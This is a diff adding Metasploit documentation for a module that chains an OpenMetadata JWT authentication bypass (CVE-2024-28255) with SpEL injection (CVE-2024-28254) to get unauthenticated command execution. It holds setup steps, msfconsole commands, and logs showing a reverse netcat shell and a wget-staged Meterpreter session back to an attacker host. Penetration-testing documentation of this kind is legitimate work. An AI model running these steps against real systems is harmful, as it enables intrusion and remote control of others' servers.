|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, |
| 4 | +in-depth lineage, and seamless team collaboration. |
| 5 | +This module chains two vulnerabilities that exist in the OpenMetadata application. |
| 6 | +The first vulnerability, [CVE-2024-28255](https://nvd.nist.gov/vuln/detail/CVE-2024-28255), bypasses the API authentication |
| 7 | +using JWT tokens. It misuses the `JwtFilter` that checks the path of url endpoint against a list of excluded endpoints |
| 8 | +that does not require authentication. |
| 9 | +Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings that will match the |
| 10 | +excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the |
| 11 | +authentication mechanism and reach any arbitrary endpoint. |
| 12 | +By chaining this vulnerability with [CVE-2024-28254](https://nvd.nist.gov/vuln/detail/CVE-2024-28254), that allows for |
| 13 | +arbitrary SpEL injection at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`,attackers are able |
| 14 | +to run arbitrary commands using Java classes such as `java.lang.Runtime` without any authentication. |
| 15 | + |
| 16 | +OpenMetadata versions `1.2.3` and below are vulnerable. |
| 17 | + |
| 18 | +The following releases were tested. |
| 19 | +* OpenMetadata 1.2.3 on Docker |
| 20 | + |
| 21 | +## Installation steps to install the OpenMedata running on Docker |
| 22 | +* Please follow these [installation instructions](https://docs.open-metadata.org/v1.3.x/quick-start/local-docker-deployment). |
| 23 | +* Please ensure that you download version 1.2.3 or below. |
| 24 | +* After successful installation your should be able to access OpenMetadata on port 8585 at `http://your_openmetadata_ip:8585`. |
| 25 | + |
| 26 | +You are now ready to test the module. |
| 27 | + |
| 28 | +## Verification Steps |
| 29 | +- [ ] Start `msfconsole` |
| 30 | +- [ ] `use exploit/linux/http/openmetadata_auth_bypass_rce` |
| 31 | +- [ ] `set rhosts <ip-target>` |
| 32 | +- [ ] `set rport <port>` |
| 33 | +- [ ] `set lhost <attacker-ip>` |
| 34 | +- [ ] `set target <0=Unix Command, 1=Linux Dropper>` |
| 35 | +- [ ] `exploit` |
| 36 | +- [ ] you should get a `reverse netcat shell` or `Meterpreter` session depending on the `payload` and `target` settings |
| 37 | + |
| 38 | +## Options |
| 39 | +No specific options |
| 40 | + |
| 41 | +## Scenarios |
| 42 | +```msf |
| 43 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > info |
| 44 | +
|
| 45 | + Name: OpenMetadata authentication bypass and SpEL injection exploit chain |
| 46 | + Module: exploit/linux/http/openmetadata_auth_bypass_rce |
| 47 | + Platform: Unix, Linux |
| 48 | + Arch: cmd, x64, x86 |
| 49 | + Privileged: Yes |
| 50 | + License: Metasploit Framework License (BSD) |
| 51 | + Rank: Excellent |
| 52 | + Disclosed: 2024-03-15 |
| 53 | +
|
| 54 | +Provided by: |
| 55 | + |
| 56 | + Matias Puerta alias tutte (https://github.com/tutte) |
| 57 | +
|
| 58 | +Module side effects: |
| 59 | + ioc-in-logs |
| 60 | + artifacts-on-disk |
| 61 | +
|
| 62 | +Module stability: |
| 63 | + crash-safe |
| 64 | +
|
| 65 | +Module reliability: |
| 66 | + repeatable-session |
| 67 | +
|
| 68 | +Available targets: |
| 69 | + Id Name |
| 70 | + -- ---- |
| 71 | + => 0 Unix Command |
| 72 | + 1 Linux Dropper |
| 73 | +
|
| 74 | +Check supported: |
| 75 | + Yes |
| 76 | +
|
| 77 | +Basic options: |
| 78 | + Name Current Setting Required Description |
| 79 | + ---- --------------- -------- ----------- |
| 80 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...] |
| 81 | + RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit. |
| 82 | + html |
| 83 | + RPORT 8585 yes The target port (TCP) |
| 84 | + SSL false no Negotiate SSL/TLS for outgoing connections |
| 85 | + SSLCert no Path to a custom SSL certificate (default is randomly generated) |
| 86 | + TARGETURI / yes The URI path of the OpenMetadata web application |
| 87 | + URIPATH no The URI to use for this exploit (default is random) |
| 88 | + VHOST no HTTP server virtual host |
| 89 | +
|
| 90 | +
|
| 91 | + When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: |
| 92 | +
|
| 93 | + Name Current Setting Required Description |
| 94 | + ---- --------------- -------- ----------- |
| 95 | + SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0. |
| 96 | + 0.0.0 to listen on all addresses. |
| 97 | + SRVPORT 8080 yes The local port to listen on. |
| 98 | +
|
| 99 | +Payload information: |
| 100 | +
|
| 101 | +Description: |
| 102 | + OpenMetadata is a unified platform for discovery, observability, and governance powered |
| 103 | + by a central metadata repository, in-depth lineage, and seamless team collaboration. |
| 104 | + This module chains two vulnerabilities that exist in the OpenMetadata aplication. |
| 105 | + The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens. |
| 106 | + It misuses the `JwtFilter` that checks the path of url endpoint against a list of excluded |
| 107 | + endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters |
| 108 | + to make any path contain any arbitrary strings that will match the excluded endpoint condition |
| 109 | + and therefore will be processed with no JWT validation allowing an attacker to bypass the |
| 110 | + authentication mechanism and reach any arbitrary endpoint. |
| 111 | + By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection |
| 112 | + at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers |
| 113 | + are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any |
| 114 | + authentication. |
| 115 | + OpenMetadata versions `1.2.3` and below are vulnerable. |
| 116 | +
|
| 117 | +References: |
| 118 | + https://nvd.nist.gov/vuln/detail/CVE-2024-28255 |
| 119 | + https://nvd.nist.gov/vuln/detail/CVE-2024-28254 |
| 120 | + https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84 |
| 121 | + https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255 |
| 122 | + https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/ |
| 123 | +
|
| 124 | +View the full module info with the info -d command. |
| 125 | +``` |
| 126 | +### OpenMetadata 1.2.3 Unix command - cmd/unix/reverse_netcat_gaping |
| 127 | +```msf |
| 128 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set target 0 |
| 129 | +target => 0 |
| 130 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload cmd/unix/reverse_netcat_gaping |
| 131 | +payload => cmd/unix/reverse_netcat_gaping |
| 132 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set rhosts 192.168.201.42 |
| 133 | +rhosts => 192.168.201.42 |
| 134 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set lhost 192.168.201.8 |
| 135 | +lhost => 192.168.201.8 |
| 136 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > exploit |
| 137 | +
|
| 138 | +[*] Started reverse TCP handler on 192.168.201.8:4444 |
| 139 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 140 | +[*] Trying to detect if target is running a vulnerable version of OpenMetadata. |
| 141 | +[+] The target is vulnerable. Version 1.2.3 |
| 142 | +[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping |
| 143 | +[*] Command shell session 17 opened (192.168.201.8:4444 -> 192.168.201.42:55160) at 2024-07-29 15:27:38 +0000 |
| 144 | +
|
| 145 | +id |
| 146 | +uid=1000(openmetadata) gid=1000(openmetadata) groups=1000(openmetadata) |
| 147 | +pwd |
| 148 | +/opt/openmetadata |
| 149 | +uname -a |
| 150 | +Linux 1e3c578a0acc 6.6.32-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Jun 13 14:14:43 UTC 2024 x86_64 Linux |
| 151 | +``` |
| 152 | +### OpenMetadata 1.2.3 Linux Dropper - linux/x64/meterpreter/reverse_tcp |
| 153 | +```msf |
| 154 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set target 1 |
| 155 | +target => 1 |
| 156 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload linux/x64/meterpreter/reverse_tcp |
| 157 | +payload => linux/x64/meterpreter/reverse_tcp |
| 158 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > exploit |
| 159 | +
|
| 160 | +[*] Started reverse TCP handler on 192.168.201.8:4444 |
| 161 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 162 | +[*] Trying to detect if target is running a vulnerable version of OpenMetadata. |
| 163 | +[+] The target is vulnerable. Version 1.2.3 |
| 164 | +[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp |
| 165 | +[*] Using URL: http://192.168.201.8:8080/WnMaYO |
| 166 | +[*] Client 192.168.201.42 (Wget) requested /WnMaYO |
| 167 | +[*] Sending payload to 192.168.201.42 (Wget) |
| 168 | +[*] Command Stager progress - 50.46% done (55/109 bytes) |
| 169 | +[*] Command Stager progress - 70.64% done (77/109 bytes) |
| 170 | +[*] Sending stage (3045380 bytes) to 192.168.201.42 |
| 171 | +[*] Command Stager progress - 82.57% done (90/109 bytes) |
| 172 | +[*] Command Stager progress - 100.00% done (109/109 bytes) |
| 173 | +[*] Meterpreter session 18 opened (192.168.201.8:4444 -> 192.168.201.42:55205) at 2024-07-29 15:30:41 +0000 |
| 174 | +[*] Server stopped. |
| 175 | +
|
| 176 | +meterpreter > getuid |
| 177 | +Server username: openmetadata |
| 178 | +meterpreter > sysinfo |
| 179 | +Computer : 172.16.240.4 |
| 180 | +OS : (Linux 6.6.32-linuxkit) |
| 181 | +Architecture : x64 |
| 182 | +BuildTuple : x86_64-linux-musl |
| 183 | +Meterpreter : x64/linux |
| 184 | +meterpreter > pwd |
| 185 | +/opt/openmetadata |
| 186 | +meterpreter > |
| 187 | +``` |
| 188 | +## Limitations |
| 189 | +Only limited payloads will work, so stick to the default payloads configured at the module. |
0 commit comments